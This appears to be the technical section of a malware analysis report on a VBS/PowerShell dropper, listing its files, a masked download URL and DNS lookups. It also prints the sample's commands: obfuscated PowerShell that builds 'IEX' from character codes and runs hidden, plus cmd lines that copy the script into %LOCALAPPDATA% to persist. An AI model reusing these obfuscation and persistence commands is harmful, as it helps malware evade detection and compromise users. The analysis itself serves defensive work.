Technical Information
- <SYSTEM32>\tasks\host
- %LOCALAPPDATA%\microsoft\<File name>.vbs
- http://re#####ismbrasil.com/janeiro/revenge33333portporcento.jpg
- DNS ASK google.com
- DNS ASK re#####ismbrasil.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$ASIOjariqEqfa5s4fd6as5=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$ASIOjariqEqfa5s4fd6as5=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y